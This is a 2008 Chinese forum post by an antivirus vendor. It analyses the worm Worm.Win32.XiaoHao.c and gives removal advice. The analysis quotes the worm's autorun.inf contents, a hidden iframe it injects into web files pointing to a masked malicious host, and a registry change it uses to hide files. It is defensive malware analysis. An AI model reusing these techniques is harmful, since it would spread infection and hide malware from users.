Board logo

标题: 小浩变种Worm.Win32.XiaoHao.c [打印本页]

作者: pioneer     时间: 2008-5-20 17:51    标题: 小浩变种Worm.Win32.XiaoHao.c

病毒名称

Worm.Win32.XiaoHao.c

捕获时间

2008-05-20

病毒摘要

    该木马是使用VC编写的蠕虫程序,由微点主动防御软件自动捕获,程序未加壳,长度为17,408 字节,病毒扩展名为exe,该病毒含有两个图标,分别,随着窗口显示模式的不同会切换显示,主要通过网页木马、文件捆绑、移动存储介质传播,病毒主要感染系统文件。

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

网页木马、文件捆绑、移动存储介质

安全提示

  已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);



  如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现" Worm.Win32.XiaoHao.c”,请直接选择删除(如图2)。



 对于未使用微点主动防御软件的用户,微点反病毒专家建议
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
3、开启windows自动更新,及时打好漏洞补丁。

[ Last edited by pioneer on 2008-5-20 at 18:01 ]
作者: pioneer     时间: 2008-5-20 17:56
病毒分析

    该木马程序被执行后,拷贝自身到%SystemRoot%\system32目录下,重命名为“exloroe.exe”;修改如下注册表健值达到隐藏病毒文件的目的;

  Quote:
项:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\
健值:CheckedValue
指向数据:00

修改系统时间,使部分杀毒软件不能正常使用;枚举盘符在各分区和移动存储介质中释放隐藏病毒文件“Slammer.exe”和“autorun.inf”,使用Windows自动播放功能来传播病毒;枚举磁盘查找所有文件类型首先判断文件扩展名为“htm”、“html”、“asp”、“aspx”、“php”、“jsp”的文件,打开文件在其中插入“<iframe src=http://Slammer.****.biz/Slammer.htm width=0 height=0></iframe>”,并将被感染的网页文件绝对路径保存在C:\Jilu.txt中;之后判断文件扩展名是否为“exe”,如果是则试图去感染“exe”文件,否则修改当前窗口的标题为“已中毒 SQL-Slammer QQ475702765's Virus”,并将当前被遍历到的文件属性设为隐藏,导致部分用户误认为系统文件被删除,引起用户恐慌;感染完毕后病毒会自动弹出一对话框,窗口标题为“已中毒 SQL-Slammer QQ475702765's Virus”。

  Quote:
autorun.inf文件的内容如下:
[Autorun]
open=Slammer.exe
shellexecute=Slammer.exe
shell\Auto\command=Slammer.exe






欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn